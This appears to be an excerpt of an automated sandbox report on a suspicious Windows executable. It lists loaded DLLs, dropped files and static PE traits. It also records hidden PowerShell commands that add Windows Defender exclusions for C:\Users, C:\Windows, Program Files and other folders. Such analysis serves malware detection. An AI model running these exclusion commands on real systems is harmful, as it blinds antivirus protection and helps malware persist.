Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Reka\rapnewsa.exeSection loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exeSection loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exeSection loaded: webio.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exeSection loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exeSection loaded: schannel.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mskeyprotect.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exeSection loaded: gpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: UBONg7lmVR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UBONg7lmVR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: UBONg7lmVR.exeStatic file information: File size 52506624 > 1048576
Source: UBONg7lmVR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3211200
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: UBONg7lmVR.exeStatic PE information: 0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
Source: C:\Reka\rapnewsa.exeCode function: 20_2_002317E0 GlobalHandle,LoadLibraryA,GetProcAddress,20_2_002317E0
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: .xdata
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /4
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /19
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /32
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /46
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /65
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /78
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /90
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_03F8D802 pushad ; ret 0_2_03F8D805
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B9DC4 pushad ; retf 0_2_099B9DC5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B1CE8 push es; ret 0_2_099B1CE7
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099BA4C4 push eax; retf 0_2_099BA4C5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F9AB8 push es; ret 0_2_099F9ADC
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F7681 push ss; ret 0_2_099F769B
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_15414D61 push es; ret 0_2_15414D75
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_15411CF0 push es; ret 0_2_15411D06
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeFile created: C:\Reka\rapnewsa.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\UBONg7lmVR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
